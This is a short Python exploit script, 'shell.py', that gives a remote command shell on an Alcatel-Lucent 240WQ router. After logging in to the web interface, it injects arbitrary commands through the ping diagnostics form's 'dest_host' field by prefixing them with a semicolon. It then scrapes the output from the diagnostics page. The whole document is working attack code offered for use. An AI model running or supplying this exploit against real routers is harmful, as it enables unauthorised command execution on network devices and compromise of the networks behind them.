Alcatel-Lucent 240WQ router shell

shell.py

#!/usr/bin/python
"""
Execute commands in the router by exploiting a vulnerability in its web interface.
Set your credentials in the `conf` variable.
"""
import requests
import sys

conf = {
    'username': 'TELMEX',
    'password': '<your WPA password>',
    'router'  : '192.168.1.254'
}

def read_user_cmd():
    while True:
        cmd = raw_input('root@' + conf['router'] + ':~$ ');
        if cmd == 'exit': sys.exit(0)
        if cmd == '': get_cmd_output()
        send_cmd(cmd)

def login():
    login_form = 'http://' + conf['router'] + '/GponForm/LoginForm'
    login_data = {
        'username': conf['username'],
        'password': conf['password']
    }
    return s.post(login_form, login_data)

def send_cmd(cmd):
    diagnostics_form = 'http://' + conf['router'] + '/GponForm/diag_XForm'
    diagnostics_data = {
        'XWebPageName': 'diag', 
        'diag_action' : 'ping', 
        'wan_conlist' : '0', 
        'dest_host'   : ';' + cmd, 
        'pinglength'  : '64', 
        'pingcount'   : '4'
    }
    return s.post(diagnostics_form, diagnostics_data)

def get_cmd_output():
    diagnostics_page = 'http://' + conf['router'] + '/diag.html'
    r = s.get(diagnostics_page)
    print(find_between(r.text, 'diag_result = "', 'No traceroute test').decode('string_escape'))

def find_between(s, first, last):
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""

if __name__ == '__main__':
    s = requests.session()
    login()
    read_user_cmd()